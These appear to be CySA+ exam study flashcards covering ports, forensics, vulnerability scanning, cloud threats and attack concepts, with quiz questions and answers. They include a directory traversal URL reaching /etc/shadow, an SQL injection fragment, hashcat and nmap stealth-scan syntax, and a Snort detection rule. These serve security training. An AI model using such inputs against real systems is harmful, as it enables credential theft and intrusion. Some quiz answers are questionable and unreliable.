SPAN (Switched Port Analyzer)

- allows for the copying of ingress and/or egress communications from one or more switch ports to another (essentially it makes a copy of everything coming in or out of a port and then puts that on a duplicate port so you can then monitor it) - once you have a SPAN port configured you need to enable packet sniffing

aircrack-ng

- allows us to extract the authentication key and try to retrieve the plain text version of your password for that network - effective against all WEP-based networks - RADIUS authentication is an effective mitigation against aircrack-ng

aireplay-ng

- allows us to inject frames to perform attacks to obtain authentication credentials for an access point, - this occurs by deauthenticating the victim from a device and then try to reconnect to that device when I capture your reauthentication

Simple Object Access Protocol (SOAP)

- an XML-based web services protocol that is used to exchange messages - supports authentication, transport security, asynchronous messaging, and built-in error handling (leverage Web Services Security, WS-Security, extensions to enforce integrity and confidentiality via SOAP) (web services using SOAP may be vulnerable to different exploits such as probing, coercive parsing, external references, malware, SQL injection)

Directory Traversal

- an application injection attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory - may be used to access any file on a system with the right permissions (e.g, http://diontraining.com/../../../../etc/shadow) (Unix systems use ../ but Windows systems use ..\) (*WARNING: attackers may use encoding to hide directory traversal attempts, for example, %2e%2e%2f represents ../)

Document Object Model (DOM) XSS

- an attack that exploits the client's web browser using *client-side* scripts to modify the content and layout of a webpage - runs with the logged in user's privileges of the local system

Reverse Shell

- an attacker opens a listening port on the remote host and causes the infected host to connect to it - is used to exploit organizations that have not configured outbound traffic filtering at the firewall - attackers use Netcat (nc) to perform these actions

Secure Multipurpose Internet Mail Extensions (S/MIME)

- an email encryption standard that adds digital signatures and public key cryptography to traditional MIME communications - in order for this to work, a user is issued a digital certificate containing his or her public key in order to use S/MIME

Active Scan (Vulnerability Scanner Types)

- an enumeration or vulnerability scan that analyzes the responses from probes sent to a target (consumes network bandwidth and processor resources) - can be configured as a credentialed, non-credentialed, server-based, or agent-based scan

Vulnerability Assessment

- an evaluation of a system's security and ability to meet compliance requirements based on the configuration state of the system as represented by information collected from the system (3 main steps) 1. collect a set of target attributes 2. analyze the differences in the current and baseline configurations 3. report the results

Factors Indicating a DDoS Attack

- an excessive number of TIME_WAIT connections in a load balancer or web servers state table - high numbers of HTTP 503 Service Unavailable log events - if you see a large amount of outbound traffic from your network, it could indicate your network contains victimized hosts being used in a DDoS against other people - IOCs with DDoS attack include bandwidth consumption and traffic spikes (*but these can be indicators for other types of attacks too)

Mimikatz

- an open-source application that allows users to view and save authentication credentials in order to perform pass the hash attacks - scans system memory for cached passwords processed by the Local Security Authority Subsystem Service (lsass.exe)

hping

- an open-source spoofing tool that provides a pentester with the ability to craft network packets to exploit vulnerable firewalls and IDS/IPS - host/port detection and firewall testing - timestamping - traceroute - fragmentation - DoS

What is the difference between Behavioral Analysis and Anomaly Analysis?

- anomaly analysis uses prescribed patterns (like an RFC or industry standard), whereas behavioral analysis records expected patterns in relation to the device being monitored - in other words, with anomaly analysis we are looking at everything following a standard - with behavioral analysis we are making up our own standard based on the observed patterns on that device

Input Validation

- any technique used to ensure that the data entered into a field or variable in an application is handled appropriately by that application - can be conducted locally (on client) or remotely (on server) (*WARNING: client-side input validation is more dangerous since it is vulnerable to malware interference) (server-side input validation can be time and resource intensive) (useful against XML, SQL, Directory Traversal, XSS injection attacks)

Irregular Peer-to-Peer (P2P) Communication

- attack indicator where hosts within a network establish connections over unauthorized ports or data transfers - attackers commonly use Server Message Block (SMB) since it is typical within Windows File/Printer sharing environments

How can you mitigate a DGA?

- best mitigation is to use a Secure Recursive DNS Resolver - occurs when one trusted DNS server communicates with several other trusted DNS servers to hunt down an IP address and returns it to the client

Unprotected Storage (Cloud Threats)

- cloud storage containers are referred to as buckets (AWS) or blobs (Azure) - incorrect permissions may occur due to default read/write permissions leftover from creation - incorrect origin settings may occur when using content delivery networks (CORS policy) (*WARNING: Access control to storage is administered through container policies, IAM authorizations, and object ACLs)

ELK/Elastic Stack

- collection of free and open-source SIEM tools that provides storage, search and analysis functions - made up of 4 different components: Elasticsearch (query/analytics), Logstash (log collection/normalization), Kibana (visualization), Beats (endpoint collection agents)

Covert Channels

- communication path that allows data to be sent outside of the network without alerting any intrusion detection or data loss countermeasures - covert channels enable the stealthy transmission of data from node to node using means that your security controls do not anticipate

Physical Access Control System (PACS)

- components and protocols that facilitate the centralized configuration and monitoring of security mechanisms within offices and data centers - can either be implemented as part of a building automation system (BAS) or a separate system (*WARNING: PACS are often installed and maintained by an external supplier and are therefore omitted from risk and vulnerability assessments by analysts)

Bus Encryption

- data is encrypted by an application prior to being placed on the data bus - ensures that the device at the end of the bus is trusted to decrypt the data

Features of MDM/EMM systems

- device enrollment and authentication (asset tracking) - remote lock and remote wipe - identifying device locations - patch and update deployments - preventing root/jailbreaks - create encrypted containers for data - restricting features/services of applications - can be used to manage incidents and conduct investigations

Code Injection

- exploit technique that runs malicious code with the identification number of a legitimate process - techniques include: masquerading (where your dropper is going to replace a genuine executable with a malicious one), DLL injection (where the dropper starts forcing a process to load as part of the DLL), DLL sideloading (where the dropper is going to exploit a vulnerability in a legitimate programs manifest to load a malicious DLL at runtime), and process hollowing (this is when a dropper starts a process in a suspended state and then rewrites the memory locations containing the process code with the malware code)

Living Off the Land *

- exploit techniques that use standard system tools and packages to perform intrusions - detection of an adversary is more difficult when they are executing malware code within standard tools and processes

SIEM Queries

- extracts records from among all the data stored for review or to show as visualization - uses Select (some fields), Where (some set of conditions), Sorted By (some fields)

What are 2 anti-tamper mechanisms to protect your systems?

- field programmable gate array (FPGA) - physically unclonable function (PUF)

How are SMTP logs typically formatted and what will we typically see in these type of logs?

- formatted in request/response fashion - see things like time of request/response, address of recipient, size of message and status code

Fingerprinting *

- identifying the type and version of an operating system (or server application) by analyzing its responses to network scans (targeting one machine) - tools that perform host system detection to map out open ports, OS type and version, file shares, running services and applications, system uptime, and other useful metadata

Patch Management

- identifying, testing, and deploying OS and application updates (fixing security bugs) - classified as critical, security-critical, recommended, and optional

How can you detect a DGA/Fast Flux Network?

- if you start seeing a lot of call-outs from you systems to random IP addresses that look like this (A1ZWBR93.com, 94ZGYS9.com, etc) - if you get a high rate of NXDOMAIN errors when resolving the DNS

Sensitive Personal Information (SPI)

- information about a subject's opinions, beliefs, and nature that is afforded specially protected status by privacy legislation - the GDPR definition of SPI includes religious beliefs, political opinions, trade union membership, gender, sexual orientation, racial or ethnic origin, genetic data, and health information

How can we mitigate/prevent Buffer Overflow attacks?

- input validation - ASLR - run programs with least privilege

What are the 4 major threats facing the Cloud?

- insecure API - improper key management - insufficient logging and monitoring - unprotected storage

Certificate Management includes

- installing, updating, and validating trusted root certificates - deploying, updating, and revoking subject certificates - preventing the use of self-signed certificates - SSH key management (cryptographic key pairs)

Benefits of DevSecOps

- integrate security from the beginning - test during and after development - automate compliance checks

Open-Source Intelligence (OSINT)

- publicly available information plus the tools used to aggregate and search it - sources: publicly available information, social media, HTML code, metadata

Firewalking

- reconnaissance technique to enumerate firewall configuration and attempt to probe hosts behind it - occurs when an attacker can find an open port on the firewall, then sends a packet with a TTL of one past the firewall to find its hosts

Port Security

- refers to the blocking of unauthorized application service ports on hosts and firewalls, or the physical and remote access ports used to allow a host to communicate on the local network - recommendations: disable web administrative interfaces and use SSH shells instead for increased security

How do you mitigate false negatives when performing a vulnerability scan?

- run repeated scans - use different scan types (or different scanner) - use different sensitivities

Benefits of a SOAR

- scans security/threat data - analyze it with ML (machine learning) - automate data enrichment process - provision new resources (incident response)

Common Platform Enumeration (CPE)

- scheme for identifying hardware devices, operating systems, and applications by MITRE corporation - database of different fingerprint signatures (this is how nmap is able to run fingerprint scans)

Nmap Scripting Engine (NSE)

- scripts are written in the Lua scripting language that can be used to carry out detailed probes - includes: OS detection and platform enumeration, Windows user account discovery, identify logged-on Windows user, basic vulnerability detection, get HTTP data and identify applications, and geolocation to traceroute probes

What are some benefits to using a CASB?

- single sign-on - malware and rogue device detection - monitor/audit user activity - mitigate data exfiltration

Premise Systems

- systems used for building automation and physical access security - many system designs allow the monitoring to be accessible from the corporate data network or even directly from the Internet

Persistence *

- the ability of a threat actor to maintain covert access to a target host or network - usually relies on modifying the Registry or a system's scheduled tasks

Secure Enclave

- the extensions allow a trusted process to create an encrypted container for sensitive data (helps prevent buffer overflow attacks) - store encryption keys and other sensitive data

File Signature (or Magic Number)

- the first two bytes of a binary header that indicates its file type - Windows portable executable file will always start with 4D 5A in HEX, MZ in ASCII, or TV in Base64 encoding

Attack Surface

- the points at which a network or application receives external connections or inputs/outputs that are potential vectors to be exploited by a threat actor - 3 main areas to consider: the holistic network, websites or cloud-services, custom software applications

File Carving

- the process of extracting data from a computer when that data has no associated file system metadata - attempts to piece together data fragments from unallocated and slack space to reconstruct deleted files or at least parts of those files

Digital Forensics

- the process of gathering and submitting computer evidence to trial and interpreting that evidence by providing expert analysis - uses specialist tools and skills to recover information from computer systems, memory and storage

Threat Modeling

- the process of identifying and assessing the possible threat actors and attack vectors that pose a risk to the security of an app, network or other system - 3 main areas to consider: Adversary Capability, Attack Surface, Attack Vector

Data enrichment

- the process of incorporating new updates and information to an organization's existing database to improve accuracy - when data enrichment is occurring, it could combine a threat intelligence feed with a log of NetFlow. This will allow an analyst to know if an IP address of interest is actually associated with a known APT (AI-based systems combine indicators from multiple threat feeds to reduce false positives and false negatives) (AI-based systems can identify obfuscated malware better than their human counterparts)

System Hardening *

- the process of securing a system's configuration and settings to reduce IT vulnerability and the possibility of being compromised (one of the most effective preventative measures when designing the system's security) - includes deactivating unnecessary components (ports, processes, applications, etc), disable unused user accounts (guest, ex-employee), implement patch management, restrict host access to peripherals (USB, Bluetooth) and restrict shell commands

Software Development Life Cycle (SDLC)

- the processes of planning, analysis, design, implementation, and maintenance that governs software and systems development - it is important to integrate security controls into each stage of the SDLC - Waterfall and Agile methods

System Assessments

- the systematic identification of critical systems by compiling an inventory of the business processes and the tangible and intangible assets and resources that support those processes - conducted to better posture and organization to reduce risk and prevent losses - consider the people, tangible assets, intangible assets and procedures

Pivoting

- the use of one infected computer to attack a different computer - uses the compromised system to attack other systems on the same network to avoid restrictions such as firewall configurations

When using tcpdump, which option or flag would you use to record the ethernet frames during a packet capture?

-e

While performing a vulnerability scan, Christina discovered an administrative interface to a storage system is exposed to the internet. She looks through the firewall logs and attempts to determine whether any access attempts have occurred from external sources. Which of the following IP addresses in the firewall logs would indicate a connection attempt from an external source?

192.186.1.100

- r-- --- --- filename

400

- rw- r-- r-- filename

644

- rwx r-x --- filename

750

- rwx rwx rwx filename

777

A cybersecurity analyst is attempting to perform an active reconnaissance technique to audit their company's security controls. Which DNS assessment technique would be classified as active?

A zone transfer

Egress Filtering

ACL rules that are applied to traffic leaving a network to prevent malware from communicating to C2 (Command and Control) servers

SLE (single loss expectancy) x ARO (annual rate of occurrence) =

ALE (annual loss expectancy)

________ and ________ are part of Sysinternals and can analyze privileges applied to a file or resource

AccessChk, AccessEnum

You are reviewing a rule within your organization's IDS. You see the following output: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any msg: "BROWSER-IE Microsoft Internet Explorer CacheSize exploit attempt"; flow: to_client,established; file_data; content:"recordset"; offset:14; depth:9; content:".CacheSize"; distance:0; within:100; pcre:"/CacheSize\s*=\s*/"; byte_test:10,>,0x3ffffffe,0,relative,string; max-detect-ips drop, service http; reference:cve,2016-8077; classtype: attempted-user; sid:65535;rev:1; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

An inbound malicious TCP packet

You have been asked to review the SIEM event logs for suspected APT activity. You have been given several indicators of compromise, such as a list of domain names and IP addresses. What is the BEST action to take in order to analyze the suspected APT activity?

Analyze the trends of events while manually reviewing them to see if any indicators match

Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect when an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?

Behavior

Which programming languages are extremely vulnerable to buffer overflow attacks? *

C/C++ (strcpy in C/C++ does not perform boundary checking of buffers)

Vehicles connect numerous subsystems over a ______

CAN (controller area network)

You are conducting a forensic analysis of a hard disk and need to access a file that appears to have been deleted. Upon analysis, you have determined that data fragments from the file exist scattered across the unallocated and slack space of the drive. Which technique could you use to recover the data?

Carving

How do you use Hashcat?

hashcat -m <HashType> -a <AttackMode> -o <OutputFile> <InputHashFile>

Port 68 (UDP)

DHCP (client port for DHCP)

Port 67 (UDP)

DHCP (server port for DHCP)

During the analysis of data as part of ongoing security monitoring activities, which of the following is NOT a good source of information to validate the results of an analyst's vulnerability scans of the network's domain controllers?

DMARC and DKIM

_____ is an effective command and control channel since it doesn't need a direct connection to the outside network and instead can use a local DNS resolver

DNS

Sender Policy Framework (SPF)

DNS record identifying hosts authorized to send mail for the domain with only one being allowed per domain (e.g, TXT @ v=spf1 mx include:_spf.google.com include:email.freshdesk.com -all)

how do you create a rule to send an alert if multiple user log-on failures occur within one hour from a single account

Error.LogonFailure > 3 AND LogonFailure.User AND Duration < 1 hour

Port 21 (TCP)

FTP (file transfer protocol)

Port 80 (TCP)

HTTP (HyperText Transfer Protocol)

Port 8080 (TCP)

HTTP-PROXY (HTTP proxy service or alternate port for HTTP)

Port 443 (TCP)

HTTPS

Port 143 (TCP)

IMAP (internet mail access protocol)

Port 993 (TCP)

IMAPS (over SSL/TLS)

How do you know if its legitimate DNS traffic or an IOC?

IOC #1: same query is repeated several times when a bot is checking into a control server for more orders (normal DNS queries happen once) IOC #2: commands sent within request or response queries will be longer and more complicated than normal

Port 631 (UDP port)

IPP (internet printing protocol)

Data in transit is protected by transport encryption protocols like

IPsec (using VPNs), TLS (connecting over the web), or WPA2 (local area network)

Port 500 (UDP port)

ISAKMP (internet security association and key management protocol that is used to set up IPsec tunnels)

Response Code 500 (URL Analysis)

Indicates a general error on the server-side of the application

You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first?

L3 cache (cache memory)

Security Development Life Cycle (SDL)

Microsoft's security framework for application development that supports dynamic development processes (agile method)

Port 123 (UDP)

NTP (network time protocol)

Port 138 (UDP)

NetBIOS-DGM (NetBIOS datagram service supports Windows File Sharing with pre-Windows 2000 version hosts)

Port 137 (UDP)

NetBIOS-NS (NetBIOS name service supports Window File Sharing with pre-Windows 2000 version hosts)

Port 139 (UDP)

NetBIOS-SSN

Port 139 (TCP)

NetBIOS-SSN (NetBIOS session service supports Windows File Sharing with pre-Windows 2000 version hosts) (Windows only)

Email Harvesting

OSINT techniques used to gather email addresses for a domain

While studying for your CompTIA CySA+ course at Dion Training, you decided you want to install a SIEM to collect data on your home network and its systems. You do not want to spend any money purchasing a license, so you decide to use an open-source option instead. Which of the following SIEM solutions utilize an open-source licensing model?

OSSIM

OODA Loop (Don't Need to Know for Exam but for the Real World)

Observe, Orient, Decide, Act (continuous loop)

Shimcache

an application usage cache that is stored in the Registry as the key (HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\AppCompatCache\AppCompatCach)

To prevent directory traversals and file inclusion attacks, use proper __________

input validation

Port 110 (TCP)

POP3 (post office protocol is a legacy mailbox access protocol)

Port 995 (TCP)

POP3S (over SSL/TLS)

Port 1723 (TCP)

PPTP (point-to-point tunneling protocol is a legacy VPN protocol with weak security implementation)

Port 3389 (TCP)

RDP (remote desktop protocol) (Windows only)

Port 520 (UDP port)

RIP (routing information protocol)

Port 111 (TCP)

RPCBIND (maps remote procedure call ~RPC~ services to port numbers in a UNIX-like environment) (Unix, Linux, MacOS only)

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?

Returns all webpages containing an email address affiliated with diontraining.com

Windows has two types of autorun keys: (keys attackers use to gain persistence)

Run, RunOnce

AV (asset value) x EF (exposure factor/probability) =

SLE (single loss expectancy)

Port 25 (TCP)

SMTP (simple mail transfer protocol)

Port 161 (UDP)

SNMP (agent port for SNMP)

Port 162 (UDP)

SNMP (management station port for receiving SNMP trap messages)

Port 22 (TCP)

SSH/SFTP (Secure File Transfer Protocol)

You are conducting an investigation on a suspected compromise. You have noticed several files that you don't recognize. How can you quickly and effectively check if the files have been infected with malware?

Submit the files to an open-source intelligence provider like VirusTotal

Port 514 (UDP port)

Syslog (server port for a syslog daemon)

Attacker now use domain generated algorithms to overcome blacklists (T/F)

T

Port 69 (UDP)

TFTP (trivial file transfer protocol)

You just received a notification that your company's email servers have been blacklisted due to reports of spam originating from your domain. What information do you need to start investigating the source of the spam emails?

The full email header from one of the spam messages

Posture Assessment

The process of assessing the endpoint for compliance with the health policy (health policy refers to a list of things that we're going to check for that device and see if it has and meets certain standards/requirements)

Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices?

User and Entity Behavior Analytics (UEBA)

Your company just launched a new invoicing website for use by your five largest vendors. You are the cybersecurity analyst and have been receiving numerous phone calls that the webpage is timing out and the website overall is performing slowly. You have noticed that the website received three million requests in just 24 hours and the service has now become unavailable for use. What do you recommend should be implemented to restore and maintain the availability of the new invoicing system?

Whitelisting

icacls

Windows command-line tool for showing and modifying file permissions (N - no access, F - full access, R - read only, RX - read and execute, M - modify, W - write, D - delete)

Local Users and Groups (new accounts)

Windows tool that is used for the management of local accounts on a system

Legal Hold (Forensic Procedures)

a process designed to preserve all relevant information when litigation (lawsuit) is reasonable expected to occur

System Memory Image Acquisition

a process that creates an image file of the system memory that can be analyzed to identify the processes that are running, the contents of temporary file systems, Registry data, network connections, cryptographic keys and more

Disk Image Acquisition

a process that creates an image file of the system's disks that can be analyzed to identify current, deleted, and hidden files on a given disk (hard drive, solid state drive, USB thumb drive, etc)

Field Programmable Gate Array (FPGA)

a processor that can be programmed to perform a specific function by a customer rather than at the time of manufacture

Idempotence

a property of IaC that an automation or orchestration action always produces the same result, regardless of the component's previous state

Trusted Automated eXchange of Indicator Information (TAXII - Indicator Management)

a protocol for supplying codified information to automate incident detection and analysis

Infrastructure as Code (IaC)

a provisioning architecture in which deployment of resources is performed by scripted automation and orchestration (allows for the use of scripted approaches to provisioning infrastructure in the cloud, making it more secure) (robust orchestration can lower overall IT costs, speed up deployments, and increase security) (uses carefully developed and tested scripts and orchestration runbooks to generate consistent builds)

whois

a public listing of all registered domains and their registered administrators

Key Performance Indicators (KPIs)

a quantifiable measure used to evaluate the success of an organization, employee, or other element in meeting objectives for performance

Penetration Test

a red team attempts to conduct an intrusion of the network using a specific scenario based on threat modeling

Deep Learning

a refinement of machine learning that enables a machine to develop strategies for solving a task given a labeled dataset and without further explicit instructions (uses complex classes of knowledge defined in relation to simpler classes of knowledge to make more informed determinations about an environment)

Indicators of Compromise (IoC)

a residual sign that an asset or network has been successfully attacked or is continuing to be attacked (evidence that an attack was successful)

Common Vulnerability Scoring System (CVSS)

a risk management approach to quantifying vulnerability data and then taking into account the degree of risk to different types of systems or information

Data Steward

a role focused on the quality of the data and associated metadata

Data Custodian

a role responsible for handling the management of the system on which the data assets are stored (e.g, System Administrator)

Privacy Officer

a role responsible for the oversight of any PII/SPI/PHI assets managed by the company

Classification (DLP Discovery and Classification)

a rule based on a confidentiality classification tag or label attached to the data

Compliance Scans

a scan based on a compliance template or checklist to ensure the controls and configuration settings are properly applied to a given target or host (*PCI DSS which requires a quarterly scan*)

Sweep

a scan directed at multiple IP addresses to discover whether a host responds to connection requests for particular ports

Fast/Basic Assessment Scan

a scan that contains options for analyzing hosts for unpatched software vulnerabilities and configuration issues

Service-Oriented Architecture (SOA)

a software architecture where components of the solution are conceived as loosely coupled services not dependent on a single platform type or technology (is an overall design architecture for mapping business workflows to the IT systems that support them)

awk (scripting tools)

a scripting engine geared toward modifying and extracting data from files or data streams in Unix, Linux, and MacOS systems

Bash (scripting tools)

a scripting language and command shell for Unix-like systems that is the default shell for Linux and MacOS

PowerShell (scripting tools)

a scripting language and command shell for Windows

Shodan (shodan.io)

a search engine optimized for identifying vulnerable internet-attached devices

Virtual Private Network (VPN)

a secure tunnel created between two endpoints connected via an unsecure network, usually over the Internet (IPsec, SSH, TLS are all forms of VPNs)

Forward Proxy (CASB)

a security appliance or host positioned at the client network edge that forwards user traffic to the cloud network if the contents of that traffic comply with policy (*WARNING: users may be able to evade the proxy and connect directly*)

Identity and Access Management (IAM)

a security process that provides identification, authentication, and authorization mechanisms for users, computers, and other entities to work with organizational assets like networks, operating systems, and applications

Data Owner

a senior (executive) role with ultimate responsibility for maintaining the CIA of the information asset (is responsible for labeling the asset and ensuring that it is protected with appropriate controls)

Forward Proxy

a server that mediates the communications between a client and another server, can filter or modify communications, and provides caching services to improve performance

Dictionary (DLP Discovery and Classification)

a set of patterns that should be matched

Traffic Spikes

a sharp increase in connection requests in comparison with a given baseline

Indicator of Compromise (IOCs)

a sign that an asset or network has been attacked or is currently under attack

Intrusion Detection System (IDS)

a software and/or hardware system that scans, audits, and monitors the security infrastructure for signs of attacks in progress

Intrusion Prevention System (IPS)

a software and/or hardware system that scans, audits, and monitors the security infrastructure for signs of attacks in progress and can actively block the attacks

Representational State Transfer (REST)

a software architectural style that defines a set of constraints to be used for creating web application services (supports HTTP, XML, CSV, or JSON formatted messages)

Serverless

a software architecture that runs functions within virtualized runtime containers in a cloud rather than on dedicated server instances (depends on orchestration) (everything in serverless is developed as a function or microservice) (eliminates the need to manage physical or virtual servers) (benefits include: no patching, no administration, no file system monitoring) (e.g, Netflix)

Microservices

a software architecture where components of the solution are conceived as highly decoupled services not dependent on a single platform type or technology (is a design paradigm applied to application development)

Amcache

an application usage cache that is stored as a hive file at (C:\Windows\appcompat\Programs\Amcache.hve)

permissions

all types of permissions should be reviewed and reinforced after an incident (change your password)

Multipurpose Internet Mail Extensions (MIME)

allows a body of an email to support different formats, such as HTML, rich text format (RTF), binary data encoded as Base64 ASCII characters, and attachments

airodump-ng

allows us to capture wireless frames that are going across the air, identify information about the wireless access point based on its MAC address, and identify clients based on their MAC address

airmon-ng

allows us to enable/disable monitor mode on our cards

a Memory Analysis tool ...

allows you to reverse engineer the code used by processes, discover how processes interact with the file system (handles) and Registry, examine network connections, retrieve cryptographic keys, and extract strings from the system memory (this can all be done once you have a memory dump)

Port Hopping

an APTs C2 application might use any port to communicate and may jump between different ports

Open Vulnerability and Assessment Language (OVAL)

an XML schema for describing system security state and querying vulnerability reports and information

Extensible Configuration Checklist Description Format (XCCDF)

an XML schema for developing and auditing best-practice configuration checklists and rules

Security Assertions Markup Language (SAML)

an XML-based data format used to exchange authentication information between a client and a service (pairs with the SOAP protocol) (provides SSO and federated identity management)

Jitter (beaconing)

an adversary's use of a random delay to frustrate indicators based on regular connection attempt intervals

Agent-based (Data Normalization)

an agent service is installed on each host to log, filter, aggregate and normalize data on the host before sending it to the SIEM server for analysis and storage

Data Sharing and Use Agreement

an agreement that sets forth the terms under which personal data can be shared or used

Interconnection Security Agreement (ISA)

an agreement used by federal agencies to set out a security risk awareness process and commit the agency and supplier to implementing security controls

Lessons Learned

an analysis of events that can provide insight into how to improve response processes in the future

Hardware Security Module (HSM)

an appliance for generating and storing cryptographic keys that is less susceptible to tampering and insider threats than software-based storage

Reverse Proxy (CASB)

an appliance positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with policy (*WARNING: this approach can only be used if the cloud application has proxy support*)

Implementation Tiers

assesses how closely core functions are integrated with the organization's overall risk management process and each tier is classed as Partial (low on scale), Risk Informed, Repeatable, and Adaptive (high on scale)

SQL Injection

attack consisting of the insertion or injection of an SQL query via input data from the client to a web application (e.g, `OR 1=1;)

Fragmentation (hping)

attempts to evade detection by IDS/IPS and firewalls by sending fragmented packets across the network for later reassembly (fragmentation and DoS not likely to be effective against most modern OS and network appliances)

IOC for Data Exfiltration using Explicit Tunnels

atypical endpoints involved in tunnels (VPN/SSH connections) due to their geographic location

IOC for Data Exfiltration using DNS

atypical query types being used, such as TXT, MX, CNAME, and NULL

Spoofing attacks can be mitigated by configuring _________ for email server systems

authentication

Command and control network hosts ...

can be difficult to identify or block since they change DNS names and IP addresses using domain generation algorithms (DGA) and fast flux DNS

Process and Memory Analysis (Virtualization Forensics)

can be performed by VM introspection (VMI) or analyzing save state files

a Registry viewer tool

can extract the Windows Registry files from an image and display them on the analysis workstation

The Microsoft Policy Analyzer ...

can identify whether a policy deviates from a configuration baseline

Disk utilization tools ...

can scan a file system and retrieve comprehensive statistics (e.g, visual representation, directory listing, real-time usage of data being written)

Full Packet Capture (FPC)

captures the entire packet including the header and the payload for all traffic entering and leaving a network

classtype (rule options)

categorizes the attack (bruteforce, DoS, etc)

Slashdot Effect (slashdotting)

causing a website to crash when a smaller website becomes popular quickly due to exposure on social sharing sites like Slashdot, Reddit and Twitter

What is one type of DoS attack method?

causing an application to overrun its memory buffer to trigger an execution failure

Atomic Execution

certain operations that should only be performed once or not at all, such as initializing a memory location (helps prevent buffer overflow attacks and race conditions)

Digital Rights Management (DRM)

copyright protection technologies for digital media which attempts to mitigate the risk of unauthorized copies being distributed

Analysis (Forensic Procedures)

create a copy of evidence for analysis and use repeatable methods and tools during analysis

Reporting (Forensic Procedures)

create a report of the methods and tools used in investigation and present detailed findings and conclusions based on the analysis

PUT (URL Analysis)

creates or replaces the requested resource

Fieldbus

digital serial data communications used in operational technology networks to link PLCs

BYOD policies complicate ______ _________ since you may not be able to legally search or seize the device

data acquisition

Insecure API (Cloud Threats)

data received by an API must pass server-side validation routines use proper error handling (sanitizing error messages) implement throttling/rate-limiting mechanisms to protect from a DoS (must secure your APIs using end-to-end encryption) (*WARNING: an API must only be used over an encrypted channel, such as HTTPS*)

The Windows ___ command has some advanced functionality for file system analysis

dir

There are principles of _________ and __________ that govern the exchange of evidence between prosecution and defense in a civil or criminal trial (Work Product Retention)

discovery, disclosure

( ) (regex syntax)

defines a matching group with a regex sequence placed within the parentheses, and then each group can subsequently be referred to by \1 for the first group, \2 for the second, and so on

Detection & Analysis (Incident Response Phases)

determine if an incident has taken place, triage it (categorize it and prioritize it), and notify stakeholders

Scope

different keywords that can be used to select the scope of the search, such as site, filetype, related, allintitle, allinurl, or allinanchor

net start

displays all running services on a computer from the command line

w (new accounts)

displays the same basic information as who, but also returns the remote host (if applicable), how long the account has been idle, the name of processes the account is actively running, the execution time of each process, and more (useful for adversary hunting)

rwho (new accounts)

displays the same basic information as who, but runs on a client/server architecture (useful for adversary hunting)

Request for Change (RFC)

document that lists the reason for a change and the procedures to implement that change

Physical Segmentation

each network segment has its own switch, and only devices connected to that switch can communicate with each other

Cloud Access Security Broker (CASB)

enterprise management software designed to mediate access to cloud services by users across all types of devices (essentially, it is the middle man that helps with authentication and ensures people are using only the services they are allowed to use) (provides visibility into how clients and other network nodes use cloud services) (can be set up as either a forward proxy, reverse proxy, or API)

Frequency-based Analysis

establishes a baseline for a metric and monitors the number of occurrences over time

Fileless Malware

executes from memory without saving anything to the filesystem

Tabletop Exercise (TTX)

exercise that uses an incident response scenario against a framework of controls or a red team

Write Blockers

forensic tool to prevent the capture or analysis device or workstation from changing data on a target disk or media (hardware write blockers are fool proof and reliable)

Response Code 502 (URL Analysis)

indicates a bad gateway has occurred when the server is acting as a proxy

Response Code 504 (URL Analysis)

indicates a gateway timeout means an issue with the upstream server

Response Code 200 (URL Analysis)

indicates a successful GET or POST request

Response Code 503 (URL Analysis)

indicates an overloading of the server is causing service unavailability

Response Code 404 (URL Analysis)

indicates that a client is requested a non-existent resource (very common)

Response Code 400 (URL Analysis)

indicates that a request could not be parsed by the server

Response Code 402 (URL Analysis)

indicates that a request did not have sufficient permissions

Response Code 401 (URL Analysis)

indicates that a request did not supply authentication credentials

Status Code 450 (SMTP Log Analysis)

indicates that the server can not access the mailbox to deliver the message

Status Code 451 (SMTP Log Analysis)

indicates the local server aborted the action due to a processing error

Status Code 452 (SMTP Log Analysis)

indicates the local server has insufficient storage space available

Status Code 250 (SMTP Log Analysis) *

indicates the message is accepted

Status Code 220 (SMTP Log Analysis) *

indicates the server is ready

Status Code 421 (SMTP Log Analysis)

indicates the service is not available

Response Code 201 (URL Analysis)

indicates where a PUT request has succeeded in creating a resource

Run * (persistence)

initializes its values asynchronously when loading them from the Registry

RunOnce * (persistence)

initializes its values in order when loading them from the registry

Human-Machine Interface (HMI)

input and output controls on a PLC to allow a user to configure and monitor the system

Server-side code should always utilize _________

input validation

To prevent XML vulnerabilities from being exploited, use proper __________

input validation

To prevent XSS attacks, use proper _________

input validation

Interactive Disassembler (IDA)

is a popular cross-platform disassembler and decompiler used by reverse engineers

Yara rule

is a test for matching certain string combinations within a given data source (binary, log file, packet capture, or email)

# (URL Analysis)

is used to indicate a fragment or anchor ID and is not processed by the webserver

nmap --scan-delay <Time> (Sparse Scanning)

issues probes with significant delays to become stealthier and avoid detection by an IDS or IPS

nmap -Tn (Scan Timing)

issues probes with using a timing pattern with n being the pattern to utilize (0 is slowest and 5 is fastest)

Forensic workstations

must have access to a high-capacity disk array subsystem or storage area network (SAN)

Virtual Segmentation *

network segmentation that relies on VLANs to create equivalent segmentation that would occur if you used physical switches

What is the nmap command to perform an intensive port scan? (intensive fingerprint scan)

nmap -sV <IP address> or nmap -A <IP address> (provides more detailed information, such as protocols, application name and version, OS type and version, host name and device type)

User Interaction (UI) (CVSS)

none (N) or required (R)

Privileges Required (PR) (CVSS)

none (N), low (L), or high (H)

Correlation rules depend on ______ data

normalized

OpenVAS

open source vulnerability scanner that began its development from the Nessus codebase when Nessus was converted to commercial software

General Data Protection Regulation (GDPR)

personal data cannot be collected, processed, or retained without the individuals informed consent (European law that provides stronger protections than the US)

Access Vector (AV) (CVSS)

physical (P), local (L), adjacent network (A), or network (N)

physical port security

physical access to the switch ports and switch hardware should be restricted to authorized staff (switches should be locked in a network closet/cabinet)

